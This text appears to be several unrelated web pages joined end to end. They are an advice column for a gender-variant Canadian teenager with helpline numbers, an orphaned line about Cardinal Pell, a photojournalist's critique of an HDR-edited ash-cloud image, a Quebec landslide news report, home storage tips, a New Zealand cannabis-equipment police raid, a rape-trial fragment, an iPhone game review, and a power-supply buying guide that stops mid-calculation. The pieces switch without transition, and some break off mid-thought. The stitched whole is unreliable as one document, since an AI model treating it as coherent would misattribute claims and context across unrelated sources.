For people who were n’t raised understanding gender to be fluid and anything but binary , it usually takes time and effort to adjust to and accept that their ideas were n’t realistic or correct , and a lot of people are very resistant to that kind of big change .
But this is often more complex .
For starters , as with many other aspects of personality and identity , parents often have a very hard time when they have to accept that their idea of who their child was or is is different from who that child turns out to be and / or identifies themselves as .
This does n’t just happen with gender .
During the teen years , parents are usually facing this in one way or another , whether it ’s about how a young person dresses , what interests they have ( or do n’t ) , what their belief system is ( or is n’t ) , what relationships they choose for themselves , what they want to do with their lives , around sex or sexual identity … and yep , with gender .
Accepting that children are separate and different from them is a part of parenting all parents sign on for , and the onus is more on them than you to deal with that , but it is tough for a lot of parents to adjust to those changes and differences , especially when they ’re unexpected or major , or when they challenge something they consider central to their own belief system and their understanding of you , themselves and the world .
When it comes to people who react very strongly to non-binary sex or gender , the impression I usually get is that those people were either raised with or adopted very limited ideas of sex and gender they made a big part of how they think about and react to everything ; that it ’s something in life they decided was very simple and could be easily ordered , just like the way some people think about race or sexual orientation .
Of course , none of those things or many other of the “ easy ” ways some folks people think others can be classified really are simple or easy : they ’re all very complicated and some people are just simplistic in the way they think about them .
If someone had the idea they can easily divide everyone into this group or that one , and in doing so feel they can always quickly and surely know their place , the place of others , how to talk to and relate with this person or that one , then we can probably get why finding out that none of that is actually true is a serious whammy .
I was n’t raised to think of sex or gender as binary or simple , so I have to work to try and understand people who were .
I figure that for them , this would be a whole lot like if I suddenly was told that the earth was n’t round , that half of everyone I knew was actually an alien from outer space or that the people I knew to be my parents for 40 years were n’t my parents at all .
I ’d probably be seriously freaked by that information , and probably would n’t react so well myself .
Many parents also worry that when a child is trans or gendervariant , it ’s because the parent did something horribly wrong , or that something is wrong with them that rubbed off on their kid .
I hate having to explain this to young people , because I know it can sound like that means there is something horribly wrong with you .
Please know there is n’t , and that ’s not what I ’m suggesting .
However , not everyone feels that way .
Some people do feel that anyone outside a gender binary is someone gone horribly wrong , but if and when they do , it ’s got a whole lot less to do with you and a whole lot more to do with a lot of deeply flawed ideas about what gender and sex are , what they mean or can mean , and hat some people really want them to mean or accomplish .
With you feeling the way you do , I do n’t need to tell you this is challenging , difficult and uncomfortable .
But while it ’s going to feel that way for you far more than the people around you , it ’s also all of those things for parents and families , too .
I do n’t say that to excuse the way your parents are reacting : I feel they are parenting poorly right now and without the kind of love and understanding you need and deserve as the child they chose to raise .
But just like you may have a transition ahead of you , or even started on some of that , so do they .
Just like yours may be rocky , theirs probably will be , too .
Ideally , what they ’d be able to do is tell you they are having a very hard time with this , but reassure you they love and accept you no matter what .
Ideally , they ’d tell you their issues are exactly that , their issues , and that they will take responsibility for them like adults , doing their level best to support you and not take their own upset out on you , even when it ’s hard for them because they have their own transition .
I know it may look like they ’ll never do things like that .
It is possible they wo n’t , some parents never do , but it ’s also possible that they might , especially if they can get some sound information , education and support from someone who can help them better understand you , your feelings and your identity .
There are parents who have come around over time who started out saying and feeling exactly the kinds of things your parents are .
My best suggestion is for you to get connected with a therapist who works expressly with trans and gendervariant people .
The aim of that therapy is n’t about “ fixing ” you .
When I say someone who specializes in this , I mean a therapist who ’s accepting of the range all of gender can be who wants to help patients to explore and figure out their own identities and help them decide if they want to transition , and if so , help them with that process .
That person can help you with your parents , including being an advocate for you with them and providing family therapy to help all of you .
You can ask your parents if they ’d help and support you in getting that care , but if you do n’t want to or they refuse , that does n’t mean you have to go without .
I see you ’re in Canada , but I do n’t know what province you ’re in .
So , here are a few solid and safe places you can phone or email who will be able to fill you in on how you can access that care .
If none of them are in your province , they can refer you to services which are .
The Sherbourne Health Center in Ontario has a phone line specific for their LGBT youth programs and care at : 416-324-5077 or you can email them at : [ email protected ] .
The Canadian Rainbow Health Coalition can be reached at : 1-800-955-5129 or you can email them at : [ email protected ] .
The Transgender Health Program in Vancouver is another resource you could call for information , at 1-866-999-1514 , or you can email them at [ email protected ] .
You can call or email any of those , and let them know that you are a gendervariant young person who wants to know how you can find and access a trans - friendly therapist .
There are also good books and information available for parents with trans or otherwise gendervariant children .
I do n’t know how heated the situation is at home right now , or how comfortable you feel giving your parents information , but if that feels like something you can safely do or want to do , I think it would benefit them .
Two good books to start with are The Transgender Child : A Handbook for Families and Professionals by Stephanie A. Brill and Rachel Pepper and Transparent : Love , Family , and Living the T with Transgender Teenagers by Cris Beam .
Central Toronto Youth Service has a wonderful booklet you can print out for them here , and there ’s an Canadian organization for parents of trans children online here : http://www.transparentcanada.ca/
One more resource that may help is Fortunate Families , which is specifically for Catholic parents of LGBT children .
I want to make sure we cover one other base .
I did n’t see anything you wrote that suggested your home was expressly abusive or unsafe , even though it ’s clearly very emotionally unsupportive of you right now .
But GLBT children and teens are often abused or maltreated in families , so I do n’t want to make any lazy assumptions .
Your safety is very important .
In the chance you are or do earnestly feel unsafe now or later , like you are at risk of being harmed by your parents because of this , or it seems like you might get kicked out of the house , 1-800-268-9688 is the number for the fantastic LGBT youthline in Canada .
You can also feel free to call them even if you just want someone else to be able to talk with about any of this , not just if you ’re in serious crisis .
It ’s great your friends have been so supportive of you so you are not completely alone in this .
Be sure to lean on them as you need to , and you may find that some of their families might be willing to give you extra support , too .
( For our American readers who want or need a similar hotline , you can call the Trevor Project at 866-488-7386 , the GLBT National Hotline at 1-888-843-4564 or the GLBT National Youth Talkline , 1-800-246-PRIDE .
For readers in the UK , there ’s the London Lesbian and Gay Switchboard at : 020 7837 7324 .
In other countries , use a search engine to search for GLBT or queer youth hotlines or crisis . )
I ’m going to leave you with a few links to look at .
I want to qualify one of them first , though .
I noticed that you ’re 13 .
It ’s common for pre-teens or teens to find that ’s a time when gender dysphoria and awareness of being gendervariant comes to a head .
The process of puberty visibly genders us to others , so it can also make what already felt like a bad fit of sex and gender feel even more uncomfortable .
But some people , too , who turn out not to be trans , can experience gender dysphoria because the process of puberty is so uncomfortable for everyone , even if you ’re not trans , but feel better over time without any kind of transition or surgery at all .
I ’m not sharing the link about that with you to question how you feel about your gender identity .
I ’m also not suggesting it ’s somehow better or worse for someone to be cis gender , trans gender or gendervariant , because I do n’t think that .
I think it should be okay for any of us to have and hold whatever our gender is and feels like to us , and that any identity that is ours and feels true to us is the right one .
I just want to include it in case that ’s what ’s going on ; to let you see one other possibility in the hopes that all I have said here , what other help and info you get , and your own process — hopefully with your parents eventual support , but even if you have to go without it — will help you figure out for yourself what feels best and is true for you .
Like I said right at the start , you should put your own feelings and sense of self first .
You ’re the expert when it comes to your own identity , and I hope in time your family and everyone around you will recognize and embrace your authority in that .
I can confirm that Cardinal George Pell is no longer the Prefect of the Secretariat for the Economy
About two weeks ago I was surfing the net and I stumbled on this image on a Helsinki Times page .
“ Nice HDR - work ” was my initial reaction ( took me c. two seconds ) and then , WTF ?
Byline with photographer and STT / Lehtikuva / Reuters …
What was this ?
I got interested , googled this particular photographer just to see if this was his style in general .
I put it in FB and tweeted it , basically asking was there anyone with a half of brain thinking in these agencies ( a very PC thing to do , btw , for a freelancer … )
Found out that there were voices already questioning this , that Scanpix had also been in the delivery chain and that Reuters had already issued a “ correction ” and filed the “ correct ” image .
But the image above had already been printed in the most prominent daily publications in the world , including our HS and DN in Sweden .
Found out that there were already editors saying how unforturnate this was and how … blah , blah , blah …
Well , you probably saw it so you know how it went .
And the point of all this ?
Very simple : there were three , four stages of so called professionals looking at this image and pushing it forward along the chain .
Did n’t anybody raise any questions ?
Took me one glance at the image to come up with conclusion “ Great HDR - work ” .
People working in Reuters , Scanpix , Lehtikuva , etc.should be professionals about this .
Surely they could see it immediately ?
Maybe something should have been done before all you could do was public corrections and apologies ?
To freely quote Kalle Palander : “ Kinda late whining when the brown stuff is already in your pants ” .
So what were the reasons for this happening ?
I listed quickly couple of choices popping to my mind :
Incompetence ?
No , not on this level – people are ( or should be ) professionals .
?
No , not on this level – people are ( or should be ) professionals .
Je m’en foutisme – as the french say ?
Maybe , but then there would be deeper reasons for that to happen – understaffing , underpayment , etc .
– as the french say ?
Maybe , but then there would be deeper reasons for that to happen – understaffing , underpayment , etc.
Pressed with time ?
Bad excuse .
No , press images is a professional business and that was not an image of a plane hitting the towers i.e it was not that urgent .
Bad excuse .
No , press images is a professional business and that was not an image of a plane hitting the towers i.e it was not that urgent .
Trying to make more money ?
Trying to sell image ( so that e.g .
Getty would not sell theirs ) or trying to make paper look great ( i.e. better than the competitor ) .
NOW WE ARE GETTING SOMEWHERE .
But what really infuriates me is the increasing tolerance for things like this .
When the poor stringer ( for Reuters , btw ) in Beirut darkened the skies couple of years back , not only did he get fired , but it was big news for a long time – and the incident is still referred to as an schoolbook example when talking about “ manipulation ” of images .
Now all we got was “ Oops , sorry , here ’s the correct image ” – and back to business as usual .
Heard even some voices muttering “ well , you know , freelancers can do anything … ”
And by acting this way we are supposed to project the image of professional photojournalism to the public ?
Yet another nail into the coffin of plausible photojournalism – hammered in by ourselves .
So we should ban pseudo - HDR ?
Well hell no .
That would show total ignorance of modern technology of photograpy .
That is : trying to limit things instrumentally .
By this I mean , trying to limit it by “ you can not do x , you can not do y , you can not do z … ”
The list would be endless and always incomplete .
“ Only the things which were possible in the classic darkroom should be allowed ” is often heard but it is equally inadequate – it ’s just pushing the problem under the rug and somehow yearning for the “ good old times ” when nothing like this could have been conceivable – which is totally untrue .
“ Images should be printed / displayed as they are from the camera ” .
Right … – and have you ever shot professionally ?
Ever heard of dynamic range and diffrences between the eyes and the sensors ?
I show again an example I posted earlier , because I feel it shows this so clearly .
The image on the left is “ straight from the camera ” – correctly exposed ( see histogram ) and the one one the right is just the histogram streched to the available dynamic range .
Manipulation ?
No , simple professional editing .
“ As it comes from the camera “ is totally empty phrase also because everything depends on the camera - and in the case of professional DSLR - cams , how you have set the camera to perform : profiles , sharpening , ALO , etc .
How about pseudo - HDR , which obviously was used in the ash - cloud image – or even true HDR – I mean SURELY they should be totally banned and black - listed ?
Absolutely no .
I state it once again :
You cannot define the truth instrumentally .
Defining “ the journalistic truth ” is very hard by itself – doing it instrumentally is outright impossible , a total dead end .
How about composites and true HDR ?
Take a look at my banner - image .
It consists of four images – shot within a timeframe of c. 10 seconds – stiched together .
Would you classify this as “ manipulation ” ( as much as I hate that word ) ?
Does it lie in any way , present “ the truth ” , the situation inaccurately ?
Apart from the fact that naturally we do not see 360° views .
As we do not see e.g. 104° views either – which is you FOV from 14 mm lens on FF 35 mm …
Here is the same image projected in Flash ; how is it untruthful to the situation I am photographing ?
Remember , you are looking at a photograph , a jpg-image , just in spherical projection .
“ Yes , but you made that image out of 4 images , so it is manipulation ” .
No , you are not listening nor thinking – or maybe reading properly , in this case .
How about true HDR , like this one below ?
It consists of three images , I shot it couple of weeks ago on a very grey day near to where I live .
Is it “ manipulated ” ?
What if I had gone the other way , and done monochrome – or tinted – would it be less or more “ manipulated ” ?
Or long exposure , say a sec or so , to blur the water ?
My triple exposure bracket was a total of maybe 1/2th sec .
Dynamics of the camera – or of my eye – were just not up to this light .
I am arguing that this does differ from the ash - cloud image .
How can I say that ?
Semantic definition
It is very simple : you cannot write a list of any kind and say “ this is ok , but that , that , that , is not … ”
It ’s totally fruitless – and if it could be done in the first place , we ’d have that list tattooed on our arm the first year of journalism school .
No , we have to use something else than an instrumental definition of rules of what goes and what does n’t .
My own personal solution is trying to remember each time to ask myself the question “ Am I lying with this image ? ” before I file it for a particular story .
Do I lie with the image above , the skier at the gate or with the banner image ?
I ’d argue I do n’t .
Because it ’s not the image itself , but the context where it is presented and used .
You present with your images what you see – without lying – as simple as that .
As with words , in one context they are the accurate description of the state of the affairs – in another , they are a straight lie and total misinformation about the situation .
Same words .
Why should pictures be any different ?
That Iceland image goes totally off in that respect .
It has drama added where there was none – just to push picture forward , to get it published , to get it sold .
It ’s not question whether he used levels , curves , layers , blending modes , pseudo - HDR or even true HDR – all that is totally irrelevant .
He wanted get his image forward – and adding drama toa dull picture was a way to ensure that .
There were great pictures coming from other sources ( see eg. Boston Globe ) – maybe the photographer felt intimidated ?
And actually now , looking at some of those images , I am starting to wonder if this was a single incident or not …
I totally understand the motivation – and I totally condemn it .
“ Thou shall not lie ” is the rule and in respectable journalism , there should be no exceptions .
Even in times like this – or better – ESPECIALLY in times like this .
And I repeat : what really makes me angry is the agencies not paying attention or not caring – which is even worse .
When I teach I almost always use the same old image from my archives as an example :
Notice the “ stain ” on the high left ?
That ’s the rotorblade of the helicopter .
It would take me ten seconds to take it out , if that much .
Still I have n’t done it , because I consider it lying , as it would present me as a better photographer as I am .
That ’s one form of lying – and a very tempting one – maybe it was too tempting in the ash cloud case ?
I probably always use the same words when addressing students and talking about this : “ Well , if you ca n’t sync your finger to the blades of the chopper , you are not good enough and there are still things to be learned ” .
I hope they get it … 😉
SAINT - JUDE , QUE . — Nearly 24 hours after a landslide swept a house and the family inside it into a giant crater , the bodies of a couple and their two children were found by rescuers in the home ’s basement .
After digging and going through the rubble we found the four victims , ” Michel Dore , Quebec 's emergency management co-ordinator , said Tuesday night .
“ They were found very close to one another , some of them lying on the couch in the family room in the basement . ”
The first body found belonged to father Richard Prefontaine .
The family 's golden retriever had been found earlier , alive , tied to a tree in the mud .
The dog , named Foxy , was initially so weak it was believed to be dead , but gained strength and was soon walking gingerly .
The landslide hit Monday night at about 9 p.m .
According to neighbours , the Prefontaine family was watching TV , probably the Montreal Canadiens ’ playoff game — in their basement .
The house was taken wholly by the slide , which created a huge scar in the landscape about 450 metres long 15 metres deep .
The area around the house that was swept away by an astonishing landslide Monday night , leaving the family of four unaccounted for , is prone to such natural events .
The risk raises questions as to whether the house should have been built there in the first place .
“ After the fact we should all say no , ” said Michel C. Dore , coordinator of the province ’s civil security department , on the scene yesterday .
“ But as I ’ve said previously , we have many built environments in flood zones and landslide zones all around Quebec . ”
Late Tuesday afternoon workers began tearing down the top two floors in their efforts to get to the house , which was partly demolished and separated from the foundation .
The basement was also inundated and earlier Tuesday they were digging canals to try and drain the water to attempt to get inside .
The Prefontaines built the house on the land 15 years ago .
Richard Prefontaine was an electrician who working in nearby Ste - Hyacinthe .
He and his wife Line had two daughters , Anaïs , in Grade 4 , and Amelie , in high school .
The Prefontaines ’ neighbour , Herman Gagnon , remembers the terror of Monday night .
He and his wife were also watching TV when the ground started to shake .
“ It was like an earthquake , ” he said .
The pipes were making noises , the electricity went out , he recalled .
“ It was cracking everywhere . ”
Gagnon and his wife fled for their lives outside and it was then that saw their neighbours ’ house had fallen into what looked like a huge crater .
“ It was only when I approached the edge of the crevace that I realized what happened , ” he said .
The uncle of Richard Prefontaine , the father of the family , was , like other family members near the scene yesterday , in total shock .
“ We think things like this only happen to others , ” he told La Presse .
“ We ca n’t do anything except pray for a miracle . ”
Five other houses were evacuated in the area , but Mayor Yves Bellefeuille said these families were expected to be able to return .
Bellefeuille said the community of 1,100 , about 75 kilometres northeast of Montreal , is in shock .
Bellefeuille added that officials are trying to “ reassure citizens ” and that counsellors will be brought in to assist people who need help .
A motorist in a red truck was also hit by the slide but survived .
Quebec is one of the regions of the world at greatest risk of landslides , Dore said .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
This area has high concentration of clay soil , which can become unstable .
Small slides are common , according to residents .
But the last slide of this magnitude was 40 years ago .
Dore said the government and municipality will evaluate other buildings in the area to ensure they are n’t also in a precarious position , and whether the areas along the Riviere Salvail Nord , which feeds into the Yamaska River , received proper geotechnical surveys .
- with files from The Canadian Press
Read more about :
Figuring out the smartest places to store your stuff is time well spent — mostly because it results in time you do n't spend cleaning .
Here are 10 smart storage solutions for your excess cords , shoes , spices , and all kinds of computer stuff .
Advertisement
Photo via Instructables .
10 . Make Your Shoes Float
Advertisement
Formal shoes , work boots , summer wear , running shoes , the spare brown pair — even those with minimal fashion sense can end up with lots of these suckers .
You could pick up one of many hanging / sliding shoe storage solutions , but we dig both the look and convenience of this DIY " floating " shoe rack .
For a slight upgrade ,
This version goes one better , hiding the hanging hardware entirely out of sight .
( Original posts : one , two ) .
Make a floating shoe rack
One of my favorite DIY bloggers , Not Martha , has come up with a great project : a floating shoe … Read more
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
9. Keep Your Cats and Their Necessities Hidden
Advertisement
Cats are great , generally low - maintenance creatures , but the stuff they need and like does take up some space .
Avoid sacrificing a room or closet to mother nature 's needs with some litter box modifications .
The ideas for turning big cupboards , entryway shelves , and under - sink spaces all come from IKEA modifications , but other furniture builds and storage bins can be adapted , too .
As for providing some space for Whiskers McMeowerton when he's not taking care of business , you can convert a bookcase into a cat tree , or fulfill every cat 's cardboard fantasy by converting a box into a kitty chaise lounge .
( Original posts : furniture , entryway , under - sink , cat tree , cat chaise ) .
Advertisement
8. Get Your Bike Off the Floor
Advertisement
Biking is a lot more fuel - efficient than driving , but keeping a bike assembled in your home is n't space - efficient .
Avoid paying for pricey bike mounts with some DIY offerings , like a few tension cables , a very cheap , board - based version , a modification of an IKEA storage pole , and that pole 's carpet - friendly cousin .
( Original posts : DIY , revisited , IKEA , carpet - friendly ) .
Advertisement
7. Make Your Filing Cabinet Actually Useful
Advertisement
If your filing cabinet serves more function as unintended shelf space than an actual filing destination , it probably needs some work .
Gina showed us her extreme filing cabinet makeover , touching on the physical changes she made to make paper shuffling more convenient .
Jason gave us a tour - de - force of his filing system workflow , which gave order and purpose to his old documents and made him actually want to file things away .
Photo by Matthew Cornell .
Advertisement
6. Declutter Your Spices and Make Them Accessible
Advertisement
Having spices you can read , see the fill level of , and easily access saves you time while cooking , and money on unnecessary purchases , as suggested by the Evil Mad Scientist Laboratories .
Then there are the magnetic spice racks , which hang your dried goods both under a shelf and on the wall .
Then , for those with quite a few spices to grab , there are the minimalist , all - access shelves that most anyone can make themselves .
( Original posts : DIY spice jars , magnetic under - shelf , magnetic wall , minimalist ) .
Advertisement
5. Stash Your Headphones Without Tangled Wires
Advertisement
Headphones , of both the big-can and inner-ear variety , get tangled and never quite tuck away neatly .
Not without some crafty assistance , anyways .
Try installing a coat hook under your desk for a hidden - but - available hiding place .
For your earbuds , first learn the " devil 's horns " wrapping method ( R.I.P. , Dio ) , then keep them together and close by with an old vinyl badge clip , or other makeshift wrappers .
Advertisement
4. Stash Your Peripherals When Not in Use
Advertisement
USB headsets , USB cables , and other sometimes necessary gear will creep its way into your workspace if there 's nowhere to put it all .
MAKE points us to a DIY iMac monitor shelf , utilizing the space between a flatscreen monitor and a wall to tuck away items so they 're within reach but out of sight .
There 's also a commercial version , if you do n't like building your own mini-shelves .
This Slashdot thread contains the thoughts of some very hardcore peripheral geeks on tidying up their wares ( think velcro ties , not plastic zips ) , and our featured workspaces have provided some inspiration before , like these hollowed out shelves , or this IKEA cabinet - turned - workspace .
( Original posts : monitor shelf , IKEA cabinet ) .
Floating Monitors and Hidden Peripherals Today 's featured workspace is full of surprises like monitors that seem to float in the air on a… Read more
Advertisement
3. Store Stuff Vertically with DIY Shelving
Advertisement
If your home or apartment did n't come with great shelving , do n't give up on it .
Whether it 's books , gear , or just general stuff that needs a new home , you can give it space with " Hungarian " square shelves ( as demonstrated in this workspace ) , more simply - made DIY shelving , or compression bookcases that do n't require any wall drilling .
Lots more ideas and inspiration can be found at our full shelving collection .
( Original posts : Hungarian , DIY , compression ) .
Advertisement
2. Tuck Your Cords Away
Advertisement
We 've covered far too many cord management tricks , techniques , and one - offs to cover inside one list item , but here 's an attempt .
Adam and Gina have both detailed their own comprehensive cord clean - ups , and we 've posted a notably cordless dorm workspace .
Gina previously rounded up 10 cable control tips , and our full cord management tag page is getting regularly updated .
Do n't let your cords litter your space and distract your mind — bend them to your will .
Advertisement
1. Hide Your Cables in Plain Sight
Advertisement
If you can't find a space or a compartment to tuck your cords into , do the next best thing — consider creatively arranging them in plain sight .
If design and sketching is n't your forte , you do n't have to get quite so fancy — something like a green cable " flower stem " , or an equivalent cable - as - hanging - platform idea , can fly just as well .
If it 's a short distance and a flat space , and you 're willing to spend a little bit on style , we 've dug the idea of FlatWire , too .
( Original posts : creative display , flower stem , FlatWire ) .
Advertisement
What 's the most clever storage solution you 've come across ?
What stuff can you just not find a smart way to store ?
Share your links and vent your material frustrations in the comments .
SEIZED : Operation Lime has targeted businesses and individuals responsible for the commercial sale of equipment used in the growing of cannabis .
A massive undercover cannabis operation netting more than 250 suspects on 750 charges will break the cornerstone of the industry , police say .
Police this morning swooped on 35 businesses and numerous residential addresses throughout the country as search warrants were executed as part of ' Operation Lime ' .
The two year operation targeted businesses and individuals responsible for the commercial sale of equipment used in the growing of cannabis .
Those arrested have appeared in district courts around the country today , police said .
The search warrants included 16 branches and the distribution centre of a major national supplier of indoor growing supplies , understood to be Switched on Gardener .
More than 250 offenders face more than 750 charges which were laid against employees , managers and directors of the companies and growers involved , police said in a statement this afternoon .
Over 100 commercial cannabis growing operations linked to the businesses were also found and dismantled during the operation .
A further 19 have been discovered today so far .
Police also seized methamphetamine , LSD , ecstasy and firearms .
Deputy Commissioner Rob Pope said today 's arrests would " break the cornerstone of the illicit cannabis cultivation industry " .
Directors and managers of the companies had been arrested and would be facing charges including cultivating cannabis and participating in an organised criminal group .
He said undercover officers had purchased equipment , were given advice on how to grow cannabis , and even purchased cannabis clones and other drugs over the counter from these offenders .
" Businesses have been committing these offences and supporting commercial cannabis growers and organised crime over a long period of time . "
TradeMe today also banned the trading of equipment that could be used in the cultivation of cannabis .
TradeMe trust and safety manager Chris Budge said police had asked the online auction website to disable three memberships , which had been done today .
The three members had been arrested as part of today 's police swoop .
He said some products sold on TradeMe were not necessarily easily identified as being linked to the cultivation of marijuana , citing a product called " Budzilla " .
This had been marketed as being good for growing vegetables .
It was not one of the products sold by members included in today 's ban , which he could not specifically name .
The banned members had likely sold products that could be used as a precursor to cannabis production , but staff had not been aware of the sales due to the thousands of listings on the site , he said .
He said TradeMe would " sharpen " its key list of words that would help staff identify products being sold on the site that could be used in the cultivation of cannabis .
Mr Pope said that suppliers of illicit equipment to growers would continue to be targeted .
" Criminals buying equipment for their cannabis grows were observed and followed .
If people purchase these products for illegal purposes , they can expect to receive a visit from the Police . "
Proceedings would also be commenced under the new Criminal Proceeds ( Recovery )
Act 2009 to strip criminals of money and assets , he said .
Honest suppliers of equipment to genuine gardeners were not targeted in the operation , he said .
Police Minister Judith Collins has tonight congratulated police .
Mrs Collins said today 's arrests would send a strong message to those who tried to produce drugs in New Zealand that they would be caught .
" The message to those who manufacture and sell drugs in our community is that the Government and the police are determined to shut down your activities , and will use every tool at their disposal to do so , " she said .
CAN a woman wearing skinny jeans be raped ?
Or are they so tight they can be taken off only with her consent ?
These are some of the questions a jury asked before acquitting a Sydney man of sexual assault .
Nicholas Eugenio Gonzalez was accused of raping the 24 - year - old as she consoled him about breaking up with one of her friends .
The jury of six men and six women heard Mr Gonzalez , 23 , had allegedly pushed the woman on to his bed , ripping off her size six skinny jeans and underpants before the attack .
In his defence , Mr Gonzalez , a navy cook , said the sex was consensual .
Beacon Hill Art Walk
Virtual this year !
Almost 500 pieces of original , handmade art have been submitted to our online sale , which will laun ...
Saturday , 12 pm , Online Google | iCal
1 Interested
In video games , the best things rarely come in small packages .
That ’s why it ’s no surprise that the game lineup for Apple ’s iPhone has been so boring .
Small American developers have preferred to focus on trying to get rich quick with 99 - cent applications that  they hope  just happen to catch a wave of buzz for a week or two .
The result has been little more than a parade of shlockware : uninspired knockoffs of the same small set of formulas , like defending your tower from invading enemies ( be they spaceships , dragons or zombies ) or matching colored items , à la Bejeweled .
Which is all by way of explaining how dumbfounded , flabbergasted and just plain impressed I have been with Chaos Rings , the sprawling new role - playing game for the iPhone and iPod Touch from Square Enix of Japan .
( According to the company ’s representatives , the game will also run on Apple ’s iPad , but does not include any additional features or graphics for it . )
Chaos Rings is the most technically advanced , visually captivating and extensively designed and written game yet made for the iPhone .
Frankly , given the meager competition , it would almost be damning Chaos Rings with faint praise to call it an “ iPhone game ” at all .
Rather , Chaos Rings is a solid , legitimate , Japanese - style single - player role - playing game that happens to run on the iPhone .
Chaos Rings is the vanguard of what Nintendo , the maker of the fabulously popular DS handheld console , and Sony , the maker of the PlayStation Portable , should have been fearing the last several years : that eventually major developers and publishers like Square Enix would start making iPhone - exclusive titles every bit as professional and polished as the games for their own systems .
Chaos Rings costs $ 12.99 at Apple ’s App Store  expensive for an iPhone game  but this product would easily find buyers at $ 29.99 on the DS or PlayStation Portable .
See our Best Black Friday Deals here !
A mistake seen too often by myself and other experienced computer builds is someone who ’s trying to save a few dollars by getting a cheap power supply , only to hear from them later on about having troubles with their computer such as it not starting , freezing , random rebooting , or worse , having the power supply take down a few parts if not the entire computer system by blowing up .
The power supply is responsible for delivering constant stable power , preventing the current from fluctuating too much and protecting your computer from power surges and other electric dangers .
Skipping on your power supply only to save a few dollars is a recipe for disaster sooner or later .
In this article , I will give you detailed explainations on how to avoid the 6 Surefire Ways of Blowing Up Your Computer Due to an Inadequate Power Supply and I ’ll end it with a list of The Best Power Supplies For Your Money .
Summary :
Buying a Power Supply that Cannot Deliver Enough Power
How much power do I need ?
Buying a Power Supply that Cannot Deliver Enough Amps on the 12V Line Electricity 101 : The Differences between Voltage , Current and Resistance .
How does this apply to a Computer ?
Ok .
Where ’s the problem ?
Simple or Multiple 12V Lines ( Rails ) ?
How to find out the real total amount of Amperes that a power supply with multiple 12V Lines can actually deliver Confusing Marketing Tricks Choosing a no-name or low - quality brand power supply
The difference between a no - name / low - quality and an high - quality power supply Detailed explanation of what is PFC The Watts Rating for a Computer may not be equal to the VA Rating .
Brands to avoid My Top 10 Brands that I recommend What about this other brand ?
Not Considering the extra power requirements of Overclocking Not Considering How Many Connectors you Need Now and Not Planning Possible Parts Upgrades
Down the road
Making Sure You Have Enough Connectors for All Your Parts Planning Possible Parts Upgrades Down the Road A Power Supply with Poor Efficiency
While your computer wo n’t explode due to a power supply with poor efficiency , your electric bill will !
80 PLUS Certified Bonus Point : The Best Power Supplies For Your Money
1. Buying a Power Supply that Cannot Deliver Enough Power
For your computer to function properly , your power supply has to be able to deliver enough power to your components .
The number 1 point in this article is power , measured in Watts ( W ) .
How much power do I need ?
It ’s impossible for me to give you a single answer , as everyone have different computer systems with different power requirements .
To answer this question , I recommend that you use the following power supply calculator :
eXtreme Power Supply Calculator
Enter the parts that you use , or intend to use and indicate whether you intend to overclock or not .
Add 100 Watts to your results
Once you have a number , I recommend that you add up 100W to your result .
For example , I get 402W out of the eXtreme calculator , for my own overclocked system .
In this case , I ’d recommend getting at least a 500W power supply .
Why ?
Because you do n’t want your power supply to run too close to its maximum output , as that will shorten its lifespan , make it less efficient ( costing you more on the electricity bill and generating more heat ) .
Also because the power supply calculator is n’t perfect and you rather want to be on the safe side with those much power than on the dangerous side with a power supply too close to its maximum capacity .
Keep in mind that overclocking increases your power requirements .
l’ll go in details about this in point # 4 .
Alright Mathieu , I know how many Watts I need , can I buy this ( Insert Number ) Watts power supply from x brand ?
No , not yet .
Remember the title of this article ?
Warning : 6 Surefire ways of blowing your computer due to an Inadequate power supply .
Watts are only the first point , you have five more points to go through .
Now that you know how many
Watts you need , let ’s move on to point # 2 .
2- Buying a Power Supply that Cannot Deliver Enough Amps on the 12V line
As much as the power ( Watts ) requirement matters , the current requirement , measured in Amps is as important if not even more important .
This is especially true if you have a or several dedicated video card (s ) .
As a general rule of thumb , you ’re aiming for the highest number on the 12V line .
What ?
Now I have Watts , Amps and 12V line ?!
This is way too confusing !
Fair enough .
Let me explain this in plain English with a very simplified electricity 101 course :
Electricity 101 : The Differences between Voltage , Current and Resistance .
Three of the most basic units in electricity are Voltage ( Measured in Volts ) and Current ( Measured in Amps ) and Resistance ( Measured in ohms ) .
A neat analogy to help you understand these terms is a system of plumbing pipes .
The voltage is equivalent to the water pressure , the current is equivalent to the flow rate , and the resistance is like the pipe size .
There is a basic equation in electrical engineering ( I = V/r ) that states how the three terms relate .
It says that the current is equal to the voltage divided by the resistance .
Thanks to HowStuffWorks for the information .
For more information on this , visit their article here .
How does this apply to a Computer ?
For a computer system , you need enough power ( Watts ) .
Different components in a computer need different voltage , such as 3.3V , 5V and 12V , among others .
For your system to work properly , your supply has to be able to deliver enough power flow , in Amps ( Amps = Watts divided by Voltage ) to every part .
Now , in the recent years , the demand on the 12V line , used for the Processor and Video Card(s ) have been increasing as these parts have become more powerful and demanding more and more power .
Ok .
Where ’s the problem ?
A lot of cheap or poorly designed power supplies will be able to deliver enough power ( Watts ) but not enough power flow ( Amps ) to the components for them to function properly , resulting in your computer not booting up , freezing , crashing , randomly restarting , etc .
This is why the Amps ratings are as important as the Watts rating on a power supply .
You do not want to overlook that .
Single or Multiple 12 v lines ?
There ’s also the debate about using a power supply with a single or multiple 12V lines .
How do you figure out which one of the two a particular model is ?
See the following pictures , which I ’ll use for a comparison at the same .
Both power supplies are rated for a maximum of 600W power output in total overall .
Can you spot the difference ?
On the OCZ model on the bottom , with multiple 12V rails , you have +12V1 , +12V2 , +12V3 and +12 V4 , each one rated for 18A .
On the Xanity model on the top , with the single 12V rail , you simply have a + 12V , rated for 37A .
You ’re probably telling yourself that the OCZ model , on the left , has more much potential , with 72A in total by combining the four 12V rails !
Not quite .
See , the thing that the marketing folks do n’t tell you is that each of those multiple rails can deliver up to 18A , but they can not do it all at the same time .
How to find out the real total amount of Amps that a power supply with multiple 12V Lines can actually deliver
A good trend that I ’m starting to see in the last year or two is that manufacturers are actually starting to write how many Amps all the 12v lines can deliver together , like the example on the right .
How do I find the Amps rating if all I have is the maximum amount of Watts all the 12V lines can deliver together ?
Simply divide the Watts rating by 12 to get the Amps rating , based on the following formula : Amps = Watts / Volts .
How to estimate the total of Amperes that multiple rails can deliver if you do n’t have the maximum amount of Watts all the 12V lines can deliver together ?
Going back to the OCZ600SXS example from one of the pictures above , To find the true total of Amperes that those 12V lines can deliver together , here are some maths for you :
The maximum combined rated wattage for the 3.3V , 5V and all the 12V lines is 580W .
